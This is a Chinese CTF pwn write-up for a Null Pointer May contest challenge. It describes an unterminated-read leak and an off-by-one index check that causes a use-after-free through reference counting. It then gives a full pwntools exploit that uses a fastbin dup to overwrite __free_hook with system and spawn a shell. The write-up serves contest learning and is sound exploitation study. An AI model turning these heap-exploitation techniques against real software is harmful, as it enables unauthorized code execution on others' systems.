空指针5月公开赛pwn题解

空指针平台的第一次pwn公开赛，很高兴拿到了邀请码

漏洞点

程序的read_n函数没有截断，可以用于泄露：

__int64 __fastcall read_n(char *a1, int len)
{
  int i; // [rsp+1Ch] [rbp-14h]
  __int64 buf; // [rsp+20h] [rbp-10h]
  unsigned __int64 v5; // [rsp+28h] [rbp-8h]

  v5 = __readfsqword(0x28u);
  buf = 0LL;
  for ( i = 0; i < len; ++i )
  {
    read(0, &buf, 1uLL);
    if ( (_BYTE)buf == 10 )
      break;
    a1[i] = buf;
  }
  return (unsigned int)i;
}

add_file函数里对file idx的检查有误：

printf("file idx:", idx);
 HIDWORD(idxa) = get_int();
 if ( idxa < 0 || SHIDWORD(idxa) > 20 || !files[SHIDWORD(idxa)] )
   return puts("invalid");

程序按理说应该最多只能new 20个file，但是这里对file idx的检查却是 idxa > 20，所以我们可以把folder[0]也当作file添加进另一个folder里，然后这里会导致folder[0]被free，具体原因还不是很清楚(调试得知的)。

赛后看了官方的wp，folder和file对象均会记录其指针被引用的次数，如果引用次数减为0就会被释放，上述把folder[0]添加到另外一个folder里的操作会导致folder[0]的引用计数被减为0而被释放掉，导致UAF

整体思路：

• 先泄露libc地址
• 把folder[0] free，在用new_file函数把它申请回来，以便后续利用
• 在把0xb0大小的tcache填满，把folder[0] free进unsorted bin
• 在用new_file函数申请一个0x68大小的file，对unsorted bin进行切割
• 在把0x70大小的tcache填满，接着就可以fastbin dup了
• 把其中一块fastbin的fd改成__free_hook，后续对tcache的分配会把fastbin都链进tcache中，修改__free_hook为system即可

远程环境是libc2.31的，不过也没啥大问题就是了，自己编译一个，在换一换偏移就行

exp：

from pwn import *

context.arch = 'amd64'

def debug(addr,PIE=True):
	if PIE:
		text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).
readlines()[1], 16)
		gdb.attach(p,'b *{}'.format(hex(text_base+addr)))
	else:
		gdb.attach(p,"b *{}".format(hex(addr)))


def cmd(command):
	p.recvuntil(">>>")
	p.sendline(str(command))
def new_folder(idx,n_sz,name):
	cmd(1)
	p.recvuntil("idx:")
	p.sendline(str(idx))
	p.recvuntil("size:")
	p.sendline(str(n_sz))
	p.recvuntil("name:")
	p.send(name)

def new_file(idx,f_sz,content):
	cmd(2)
	p.recvuntil("idx:")
	p.sendline(str(idx))
	p.recvuntil("size:")
	p.sendline(str(f_sz))
	p.recvuntil("file:")
	p.send(content)
	
def add_file(folder_idx,file_idx):
	cmd(3)
	p.recvuntil("idx:")
	p.sendline(str(folder_idx))
	p.recvuntil("idx:")
	p.sendline(str(file_idx))

def drop(idx):
	cmd(4)
	p.recvuntil("idx:")
	p.sendline(str(idx))


def show(idx):
	cmd(5)
	p.recvuntil("idx:")
	p.sendline(str(idx))


def main(host,port=20000):
	global p
	if host:
		p = remote(host,port)
	else:
		# p = process("./folder")
		p = process("./folder_31",env={"LD_PRELOAD":"./libc-2.31.so"})
		# debug(0x00000000000154D)
		gdb.attach(p)
	new_folder(1,0x1d0,"folder\n")
	new_file(0,0x210,"file".ljust(0x210,"0"))
	new_file(1,0x5f0,"file".ljust(0x5f0,"1"))
	new_file(2,0x210,"file".ljust(0x210,"2"))
	for i in range(3):
		drop(i)
	new_file(0,0x210,"\n")
	new_file(1,0x2f0,"\n")
	new_file(2,0x210,"\n")
	add_file(1,0)
	add_file(1,1)
	add_file(1,2)
	show(1)
	p.recvuntil("files:\n\n")
	libc.address = u64(p.recvuntil("\n",drop=True).ljust(8,b"\x00")) - 0x1ec050
	
	heap = u64(p.recvuntil("\n",drop=True).ljust(8,b"\x00"))
	
	info("libc : " + hex(libc.address))
	info("heap : " + hex(heap))
	
	new_folder(0,0x200,"folder\n")
	# free folder[0]
	add_file(1,20)
	new_file(3,0xa8,"3\n")
	# file_3 and folder_0 are the same address
	
	for i in range(4,11):
		new_file(i,0xa8,chr(i)+"\n")
	for i in range(4,11):
		drop(i)
	
	add_file(1,20)
	
	new_file(4,0x68,chr(4)+"\n")
	
	for i in range(5,13):
		new_file(i,0x68,chr(i)+"\n")
	for i in range(5,12):
		drop(i)
	
	drop(3)
	drop(12)
	drop(4)
	
	for i in range(3,10):
		new_file(i,0x68,chr(i)+"\n")
	
	new_file(10,0x68,p64(libc.symbols["__free_hook"])+b'\n')
	new_file(11,0x68,"/bin/sh\x00\n")
	new_file(12,0x68,"/bin/sh\x00\n")
	new_file(13,0x68,p64(libc.symbols["system"])+b'\n')
	
	pause()
	drop(12)
	
	p.interactive()
	
if __name__ == "__main__":
	libc = ELF("./libc-2.31.so",checksec=False)
	# elf = ELF("./easyheap",checksec=False)
	main(args['REMOTE'])

最后吐槽下联通的网在乡下好差，这个payload一分钟内打不完，后来换成电信的网，几下就解决了